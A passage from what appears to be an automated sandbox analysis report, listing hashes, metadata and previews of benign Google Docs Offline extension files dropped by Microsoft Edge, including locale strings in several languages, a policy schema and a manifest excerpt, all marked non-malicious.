                                                                                                                                                                                                                                                                                                      SSDEEP:48:YWi+htQTKEQb3aXQYJLSWy7sTQThQTnQtQTrEmQ6kiLsegQSJFwsQGaiPn779I+S:zhiTK5b3tUGVjTGTnQiTryOLpyaxYf/S
                                                                                                                                                                                                                                                                                                      MD5:B8A4FD612534A171A9A03C1984BB4BDD
                                                                                                                                                                                                                                                                                                      SHA1:F513F7300827FE352E8ECB5BD4BB1729F3A0E22A
                                                                                                                                                                                                                                                                                                      SHA-256:54241EBE651A8344235CC47AFD274C080ABAEBC8C3A25AFB95D8373B6A5670A2
                                                                                                                                                                                                                                                                                                      SHA-512:C03E35BFDE546AEB3245024EF721E7E606327581EFE9EAF8C5B11989D9033BDB58437041A5CB6D567BAA05466B6AAF054C47F976FD940EEEDF69FDF80D79095B
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):934
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.882122893545996
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:1HAF8pMv1RS4LXL22IUjdh8uJwpPqLDEtxKLhSS:hyv1RS4LXx38u36QsS
                                                                                                                                                                                                                                                                                                      MD5:8E55817BF7A87052F11FE554A61C52D5
                                                                                                                                                                                                                                                                                                      SHA1:9ABDC0725FE27967F6F6BE0DF5D6C46E2957F455
                                                                                                                                                                                                                                                                                                      SHA-256:903060EC9E76040B46DEB47BBB041D0B28A6816CB9B892D7342FC7DC6782F87C
                                                                                                                                                                                                                                                                                                      SHA-512:EFF9EC7E72B272DDE5F29123653BC056A4BC2C3C662AE3C448F8CB6A4D1865A0679B7E74C1B3189F3E262109ED6BC8F8D2BDE14AEFC8E87E0F785AE4837D01C7
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "VYTVORI. NOV.".. },.. "explanationofflinedisabled": {.. "message": "Ste offline. Ak chcete pou.i. Dokumenty Google bez pripojenia na internet, po najbli..om pripojen. na internet prejdite do nastaven. na domovskej str.nke Dokumentov Google a.zapnite offline synchroniz.ciu.".. },.. "explanationofflineenabled": {.. "message": "Ste offline, no st.le m..ete upravova. dostupn. s.bory a.vytv.ra. nov..".. },.. "extdesc": {.. "message": ".prava, tvorba a.zobrazenie dokumentov, tabuliek a.prezent.ci.. To v.etko bez pr.stupu na internet.".. },.. "extname": {.. "message": "Dokumenty Google v re.ime offline".. },.. "learnmore": {.. "message": ".al.ie inform.cie".. },.. "popuphelptext": {.. "message": "P..te, upravujte a.spolupracuje, kdeko.vek ste, a.to s.pripojen.m na internet aj bez neho.".. }..}..
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):963
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.6041913416245
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:12:1HASvgfECBxNFCEuKXowwJrpvPwNgEcPJJJEfWOCBxeFCJuGuU4KYXCSUXKDxX4A:1HAXMKYw8VYNLcaeDmKYLdX2zJBG5
                                                                                                                                                                                                                                                                                                      MD5:BFAEFEFF32813DF91C56B71B79EC2AF4
                                                                                                                                                                                                                                                                                                      SHA1:F8EDA2B632610972B581724D6B2F9782AC37377B
                                                                                                                                                                                                                                                                                                      SHA-256:AAB9CF9098294A46DC0F2FA468AFFF7CA7C323A1A0EFA70C9DB1E3A4DA05D1D4
                                                                                                                                                                                                                                                                                                      SHA-512:971F2BBF5E9C84DE3D31E5F2A4D1A00D891A2504F8AF6D3F75FC19056BFD059A270C4C9836AF35258ABA586A1888133FB22B484F260C1CBC2D1D17BC3B4451AA
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "USTVARI NOVO".. },.. "explanationofflinedisabled": {.. "message": "Nimate vzpostavljene povezave. .e .elite uporabljati Google Dokumente brez internetne povezave, odprite nastavitve na doma.i strani Google Dokumentov in vklopite sinhronizacijo brez povezave, ko naslednji. vzpostavite internetno povezavo.".. },.. "explanationofflineenabled": {.. "message": "Nimate vzpostavljene povezave, vendar lahko .e vedno urejate razpolo.ljive datoteke ali ustvarjate nove.".. },.. "extdesc": {.. "message": "Urejajte, ustvarjajte in si ogledujte dokumente, preglednice in predstavitve . vse to brez internetnega dostopa.".. },.. "extname": {.. "message": "Google Dokumenti brez povezave".. },.. "learnmore": {.. "message": "Ve. o tem".. },.. "popuphelptext": {.. "message": "Pi.ite, urejajte in sodelujte, kjer koli ste, z internetno povezavo ali brez nje.".. }..}..
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1320
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.569671329405572
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:1HArg/fjQg2JwrfZtUWTrw1P4epMnRGi5TBmuPDRxZQ/XtiCw/Rwh/Q9EVz:ogUg2JwDZe6rwKI8VTP9xK1CwhI94
                                                                                                                                                                                                                                                                                                      MD5:7F5F8933D2D078618496C67526A2B066
                                                                                                                                                                                                                                                                                                      SHA1:B7050E3EFA4D39548577CF47CB119FA0E246B7A4
                                                                                                                                                                                                                                                                                                      SHA-256:4E8B69E864F57CDDD4DC4E4FAF2C28D496874D06016BC22E8D39E0CB69552769
                                                                                                                                                                                                                                                                                                      SHA-512:0FBAB56629368EEF87DEEF2977CA51831BEB7DEAE98E02504E564218425C751853C4FDEAA40F51ECFE75C633128B56AE105A6EB308FD5B4A2E983013197F5DBA
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):884
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.627108704340797
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:1HA0NOYT/6McbnX/yzklyOIPRQrJlvDymvBd:vNOcyHnX/yg0P4Bymn
                                                                                                                                                                                                                                                                                                      MD5:90D8FB448CE9C0B9BA3D07FB8DE6D7EE
                                                                                                                                                                                                                                                                                                      SHA1:D8688CAC0245FD7B886D0DEB51394F5DF8AE7E84
                                                                                                                                                                                                                                                                                                      SHA-256:64B1E422B346AB77C5D1C77142685B3FF7661D498767D104B0C24CB36D0EB859
                                                                                                                                                                                                                                                                                                      SHA-512:6D58F49EE3EF0D3186EA036B868B2203FE936CE30DC8E246C32E90B58D9B18C624825419346B62AF8F7D61767DBE9721957280AA3C524D3A5DFB1A3A76C00742
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "SKAPA NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du .r offline. Om du vill anv.nda Google Dokument utan internetuppkoppling, .ppna inst.llningarna p. Google Dokuments startsida och aktivera offlinesynkronisering n.sta g.ng du .r ansluten till internet.".. },.. "explanationofflineenabled": {.. "message": "Du .r offline, men det g.r fortfarande att redigera tillg.ngliga filer eller skapa nya.".. },.. "extdesc": {.. "message": "Redigera, skapa och visa dina dokument, kalkylark och presentationer . helt utan internet.tkomst.".. },.. "extname": {.. "message": "Google Dokument Offline".. },.. "learnmore": {.. "message": "L.s mer".. },.. "popuphelptext": {.. "message": "Skriv, redigera och samarbeta .verallt, med eller utan internetanslutning.".. }..}..
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):980
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.50673686618174
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:12:1HASvgNHCBxNx1HMHyMhybK7QGU78oCuafIvfCBxex6EYPE5E1pOCSUJqONtCBh8:1HAGDQ3y0Q/Kjp/zhDoKMkeAT6dBaX
                                                                                                                                                                                                                                                                                                      MD5:D0579209686889E079D87C23817EDDD5
                                                                                                                                                                                                                                                                                                      SHA1:C4F99E66A5891973315D7F2BC9C1DAA524CB30DC
                                                                                                                                                                                                                                                                                                      SHA-256:0D20680B74AF10EF8C754FCDE259124A438DCE3848305B0CAF994D98E787D263
                                                                                                                                                                                                                                                                                                      SHA-512:D59911F91ED6C8FF78FD158389B4D326DAF4C031B940C399569FE210F6985E23897E7F404B7014FC7B0ACEC086C01CC5F76354F7E5D3A1E0DEDEF788C23C2978
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "FUNGUA MPYA".. },.. "explanationofflinedisabled": {.. "message": "Haupo mtandaoni. Ili uweze kutumia Hati za Google bila muunganisho wa intaneti, wakati utakuwa umeunganishwa kwenye intaneti, nenda kwenye sehemu ya mipangilio kwenye ukurasa wa kwanza wa Hati za Google kisha uwashe kipengele cha usawazishaji nje ya mtandao.".. },.. "explanationofflineenabled": {.. "message": "Haupo mtandaoni, lakini bado unaweza kubadilisha faili zilizopo au uunde mpya.".. },.. "extdesc": {.. "message": "Badilisha, unda na uangalie hati, malahajedwali na mawasilisho yako . yote bila kutumia muunganisho wa intaneti.".. },.. "extname": {.. "message": "Hati za Google Nje ya Mtandao".. },.. "learnmore": {.. "message": "Pata Maelezo Zaidi".. },.. "popuphelptext": {.. "message": "Andika hati, zibadilishe na ushirikiane na wuser popote ulipo, iwe una muunganisho wa intaneti au huna.".. }..}..
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1941
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.132139619026436
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:1HAoTZwEj3YfVLiANpx96zjlXTwB4uNJDZwq3CP1B2xIZiIH1CYFIZ03SoFyxrph:JCEjWiAD0ZXkyYFyPND1L/I
                                                                                                                                                                                                                                                                                                      MD5:DCC0D1725AEAEAAF1690EF8053529601
                                                                                                                                                                                                                                                                                                      SHA1:BB9D31859469760AC93E84B70B57909DCC02EA65
                                                                                                                                                                                                                                                                                                      SHA-256:6282BF9DF12AD453858B0B531C8999D5FD6251EB855234546A1B30858462231A
                                                                                                                                                                                                                                                                                                      SHA-512:6243982D764026D342B3C47C706D822BB2B0CAFFA51F0591D8C878F981EEF2A7FC68B76D012630B1C1EB394AF90EB782E2B49329EB6538DD5608A7F0791FDCF5
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1969
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.327258153043599
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1674
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.343724179386811
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1063
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.853399816115876
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1333
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.686760246306605
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1263
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.861856182762435
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1074
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.062722522759407
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):879
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.7905809868505544
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "..".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ................ Google ....................".. },.. "explanationofflineenabled": {.. "message": ".............................".. },.. "extdesc": {.. "message": "...................... - ........".. },.. "extname": {.. "message": "Google .......".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "...............................".. }..}..
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1205
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.50367724745418
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:YWvqB0f7Cr591AhI9Ah8U1F4rw4wtB9G976d6BY9scKUrPoAhNehIrI/uIXS1:YWvl7Cr5JHrw7k7u6BY9trW+rHR
                                                                                                                                                                                                                                                                                                      MD5:524E1B2A370D0E71342D05DDE3D3E774
                                                                                                                                                                                                                                                                                                      SHA1:60D1F59714F9E8F90EF34138D33FBFF6DD39E85A
                                                                                                                                                                                                                                                                                                      SHA-256:30F44CFAD052D73D86D12FA20CFC111563A3B2E4523B43F7D66D934BA8DACE91
                                                                                                                                                                                                                                                                                                      SHA-512:D2225CF2FA94B01A7B0F70A933E1FDCF69CDF92F76C424CE4F9FCC86510C481C9A87A7B71F907C836CBB1CA41A8BEBBD08F68DBC90710984CA738D293F905272
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"createnew":{"message":"\u5efa\u7acb\u65b0\u9805\u76ee"},"explanationofflinedisabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\u3002\u5982\u8981\u5728\u6c92\u6709\u4e92\u806f\u7db2\u9023\u7dda\u7684\u60c5\u6cc1\u4e0b\u4f7f\u7528\u300cGoogle \u6587\u4ef6\u300d\uff0c\u8acb\u524d\u5f80\u300cGoogle \u6587\u4ef6\u300d\u9996\u9801\u7684\u8a2d\u5b9a\uff0c\u4e26\u5728\u4e0b\u6b21\u9023\u63a5\u4e92\u806f\u7db2\u6642\u958b\u555f\u96e2\u7dda\u540c\u6b65\u529f\u80fd\u3002"},"explanationofflineenabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\uff0c\u4f46\u60a8\u4ecd\u53ef\u4ee5\u7de8\u8f2f\u53ef\u7528\u6a94\u6848\u6216\u5efa\u7acb\u65b0\u6a94\u6848\u3002"},"extdesc":{"message":"\u7de8\u8f2f\u3001\u5efa\u7acb\u53ca\u67e5\u770b\u60a8\u7684\u6587\u4ef6\u3001\u8a66\u7b97\u8868\u548c\u7c21\u5831\uff0c\u5b8c\u5168\u4e0d\u9700\u4f7f\u7528\u4e92\u806f\u7db2\u3002"},"extname":{"message":"\u300cGoogle \u6587\u4ef6\u300d\u96e2\u7dda\u7248"},"learnmore":{"message":"\u77ad\u89e3\u8a
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):843
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.76581227215314
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:12:1HASvgmaCBxNtBtA24ZOuAeOEHGOCBxetBtMHQIJECSUnLRNocPNy6CBhU5OGg1O:1HAEfQkekYyLvRmcPGgzcL2kx5U
                                                                                                                                                                                                                                                                                                      MD5:0E60627ACFD18F44D4DF469D8DCE6D30
                                                                                                                                                                                                                                                                                                      SHA1:2BFCB0C3CA6B50D69AD5745FA692BAF0708DB4B5
                                                                                                                                                                                                                                                                                                      SHA-256:F94C6DDEDF067642A1AF18D629778EC65E02B6097A8532B7E794502747AEB008
                                                                                                                                                                                                                                                                                                      SHA-512:6FF517EED4381A61075AC7C8E80C73FAFAE7C0583BA4FA7F4951DD7DBE183C253702DEE44B3276EFC566F295DAC1592271BE5E0AC0C7D2C9F6062054418C7C27
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": ".....".. },.. "explanationofflinedisabled": {.. "message": ".................. Google ................ Google .................".. },.. "explanationofflineenabled": {.. "message": ".........................".. },.. "extdesc": {.. "message": ".............................".. },.. "extname": {.. "message": "Google .....".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "................................".. }..}..
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):912
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.65963951143349
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:YlMBKqLnI7EgBLWFQbTQIF+j4h3OadMJzLWnCieqgwLeOvKrCRPE:YlMBKqjI7EQOQb0Pj4heOWqeyaBrMPE
                                                                                                                                                                                                                                                                                                      MD5:71F916A64F98B6D1B5D1F62D297FDEC1
                                                                                                                                                                                                                                                                                                      SHA1:9386E8F723C3F42DA5B3F7E0B9970D2664EA0BAA
                                                                                                                                                                                                                                                                                                      SHA-256:EC78DDD4CCF32B5D76EC701A20167C3FBD146D79A505E4FB0421FC1E5CF4AA63
                                                                                                                                                                                                                                                                                                      SHA-512:30FA4E02120AF1BE6E7CC7DBB15FAE5D50825BD6B3CF28EF21D2F2E217B14AF5B76CFCC165685C3EDC1D09536BFCB10CA07E1E2CC0DA891CEC05E19394AD7144
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"createnew":{"message":"DALA ENTSHA"},"explanationofflinedisabled":{"message":"Awuxhunyiwe ku-inthanethi. Ukuze usebenzise i-Google Amadokhumenti ngaphandle koxhumano lwe-inthanethi, iya kokuthi izilungiselelo ekhasini lasekhaya le-Google Amadokhumenti bese uvula ukuvumelanisa okungaxhunyiwe ku-inthanethi ngesikhathi esilandelayo lapho uxhunywe ku-inthanethi."},"explanationofflineenabled":{"message":"Awuxhunyiwe ku-inthanethi, kodwa usangakwazi ukuhlela amafayela atholakalayo noma udale amasha."},"extdesc":{"message":"Hlela, dala, futhi ubuke amadokhumenti akho, amaspredishithi, namaphrezentheshini \u2014 konke ngaphandle kokufinyelela kwe-inthanethi."},"extname":{"message":"I-Google Amadokhumenti engaxhumekile ku-intanethi"},"learnmore":{"message":"Funda kabanzi"},"popuphelptext":{"message":"Bhala, hlela, futhi hlanganyela noma yikuphi lapho okhona, unalo noma ungenalo uxhumano lwe-inthanethi."}}.
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):11406
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.745845607168024
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:192:RBG1G1UPkUj/86Op//Ier/2nsNLJtwg+K8HNnswuH+svyw6r+cgTSJJT4LGkt:m8IEI4u8/EgG4
                                                                                                                                                                                                                                                                                                      MD5:0A68C9539A188B8BB4F9573F2F2321D6
                                                                                                                                                                                                                                                                                                      SHA1:E0F814FA4DCC04EDC6A5D39CBC1038979E88F0E5
                                                                                                                                                                                                                                                                                                      SHA-256:39E6C25D096AFD156644F07586D85E37F1F7B3DA9B636471E8D15CEB14DB184F
                                                                                                                                                                                                                                                                                                      SHA-512:13F133C173C6622B8E1B6F86A551CBC5B0B2446B3CF96E4AE8CA2646009B99E4A360C2DB3168CB94A488FAEBD215003DFA60D10150B7A85B5F8919900BD01CCC
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:[{"description":"treehash per file","signed_content":{"payload":"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
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):854
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.284628987131403
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:12:ont+QByTwnnGNcMbyWM+Q9TZldnnnGGxlF/S0WOtUL0M0r:vOrGe4dDCVGOjWJ0nr
                                                                                                                                                                                                                                                                                                      MD5:4EC1DF2DA46182103D2FFC3B92D20CA5
                                                                                                                                                                                                                                                                                                      SHA1:FB9D1BA3710CF31A87165317C6EDC110E98994CE
                                                                                                                                                                                                                                                                                                      SHA-256:6C69CE0FE6FAB14F1990A320D704FEE362C175C00EB6C9224AA6F41108918CA6
                                                                                                                                                                                                                                                                                                      SHA-512:939D81E6A82B10FF73A35C931052D8D53D42D915E526665079EEB4820DF4D70F1C6AEBAB70B59519A0014A48514833FEFD687D5A3ED1B06482223A168292105D
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{. "type": "object",. "properties": {. "allowedDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Allow users to enable Docs offline for the specified managed domains.",. "description": "Users on managed devices will be able to enable docs offline if they are part of the specified managed domains.". },. "autoEnabledDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Auto enable Docs offline for the specified managed domains in certain eligible situations.",. "description": "Users on managed devices, in certain eligible situations, will be able to automatically access and edit recent files offline for the managed domains set in this property. They can still disable it from Drive settings.". }. }.}.
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):2525
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.417954053901
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:1HEZ4WPoolELb/KxktGw3VwELb/4iL2QDkUpvdz1xxy/Atj17x9yiVvQe:WdP5aLTKQGwlTLT4oRvvxs/AP7xgiVb
                                                                                                                                                                                                                                                                                                      MD5:5E425DC36364927B1348F6C48B68C948
                                                                                                                                                                                                                                                                                                      SHA1:9E411B88453DEF3F7CFCB3EAA543C69AD832B82F
                                                                                                                                                                                                                                                                                                      SHA-256:32D9C8DE71A40D71FC61AD52AA07E809D07DF57A2F4F7855E8FC300F87FFC642
                                                                                                                                                                                                                                                                                                      SHA-512:C19217B9AF82C1EE1015D4DFC4234A5CE0A4E482430455ABAAFAE3F9C8AE0F7E5D2ED7727502760F1B0656F0A079CB23B132188AE425E001802738A91D8C5D79
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "author": {.. "email": "docs-hosted-app-own@google.com".. },.. "background": {.. "service_worker": "service_worker_bin_prod.js".. },.. "content_capabilities": {.. "matches": [ "https://docs.google.com/*", "https://drive.google.com/*", "https://drive-autopush.corp.google.com/*", "https://drive-daily-0.corp.google.com/*", "https://drive-daily-1.corp.google.com/*", "https://drive-daily-2.corp.google.com/*", "https://drive-daily-3.corp.google.com/*", "https://drive-daily-4.corp.google.com/*", "https://drive-daily-5.corp.google.com/*", "https://drive-daily-6.corp.google.com/*", "https://drive-preprod.corp.google.com/*", "https://drive-staging.corp.google.com/*" ],.. "permissions": [ "clipboardRead", "clipboardWrite", "unlimitedStorage" ].. },.. "content_security_policy": {.. "extension_pages": "script-src 'self'; object-src 'self'".. },.. "default_locale": "en_US",.. "description": "__MSG_extDesc__",.. "externally_connectable": {.. "ma
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):97
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.862433271815736
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:PouV7uJL5XL/oGLvLAAJR90bZNGXIL0Hac4NGb:hxuJL5XsOv0EmNV4HX4Qb
                                                                                                                                                                                                                                                                                                      MD5:B747B5922A0BC74BBF0A9BC59DF7685F
                                                                                                                                                                                                                                                                                                      SHA1:7BF124B0BE8EE2CFCD2506C1C6FFC74D1650108C
                                                                                                                                                                                                                                                                                                      SHA-256:B9FA2D52A4FFABB438B56184131B893B04655B01F336066415D4FE839EFE64E7
                                                                                                                                                                                                                                                                                                      SHA-512:7567761BE4054FCB31885E16D119CD4E419A423FFB83C3B3ED80BFBF64E78A73C2E97AAE4E24AB25486CD1E43877842DB0836DB58FBFBCEF495BC53F9B2A20EC
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:<!DOCTYPE html>.<html>.<body>. <script src="offscreendocument_main.js"></script>.</body>.</html>
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (4882)
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):122218
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.439997574414675
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:1536:naCwKqAbNBbV9HGsR43l9S6w3xu7gXMgaG0R6RxNbF4Ki3wqP+PrQY2PEtb1B:Jfcs1XMr2zbF4Ki+PkPEfB
                                                                                                                                                                                                                                                                                                      MD5:67C4451398037DD1C497A1EA98227630
                                                                                                                                                                                                                                                                                                      SHA1:F5BB00D46BCAB5A8A02E68E4895AEB6859B74AA8
                                                                                                                                                                                                                                                                                                      SHA-256:59123D5A34A319791E90391FC55F0F4B8F5ABB6DB67353609DB25ACC3E99C166
                                                                                                                                                                                                                                                                                                      SHA-512:17F35CE2A11C26168CC52C4AE2BEC548A1AEB1B1F9CB3475B0552BDE71CFE94C5C0C4F3F51267EF7C7D9B0E01E1D1259F48968E70EE1E905471BA0C76ECA81EA
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text
